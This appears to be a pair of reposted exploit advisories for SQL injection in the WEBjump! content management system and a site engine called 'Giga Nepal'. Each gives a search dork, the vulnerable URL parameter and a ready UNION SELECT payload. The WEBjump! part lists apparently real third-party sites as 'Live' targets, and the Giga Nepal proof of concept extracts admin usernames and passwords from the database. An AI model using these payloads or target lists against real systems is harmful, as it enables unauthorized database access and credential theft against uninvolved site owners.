CMS WEBjump! SQL Injection

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

–== Dork ==–
Powered by Content Management System WEBjump! “portfolio_genre.php?id=”

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

–== Dork ==–
Powered by Content Management System WEBjump! “news_id.php?lang=”

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]

Source

Giga Nepal SQL Injection Vulnerability

======================================
Author : Gonzhack

Contact : gonzhack@gmail.com

Home : Http://www.indonesiancoder.com

======================================
D0rk : Powered By Giga Nepal
======================================
Bug :

/newsdetail.php?id=[sql]

POC :

-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin–

======================================

Source


 

Copyleft © 2011